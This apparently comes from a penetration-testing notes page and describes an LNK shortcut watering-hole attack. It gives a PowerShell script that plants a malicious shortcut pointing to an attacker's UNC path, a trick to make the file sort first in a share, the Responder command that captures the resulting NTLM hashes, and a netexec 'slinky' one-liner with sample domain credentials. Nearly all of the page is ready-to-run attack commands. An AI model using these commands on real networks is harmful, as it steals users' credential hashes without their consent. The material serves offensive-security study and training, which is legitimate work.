LNK File Attacks

A LNK File Attack is a type of watering hole attack that is done by creating a malicious file that points back to us, placing it inside of shared folder and then waiting for hashes to fly into Responder.

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\evil.lnk")
$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "evil"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Save the file with an @ symbol at beginning of the name so it loads at the top of the share

Run Responder

sudo responder -I eth0 -dwv

Automated Attack via Netexec

netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149
PreviousToken ImpersonationNextGPP / cPassword Attacks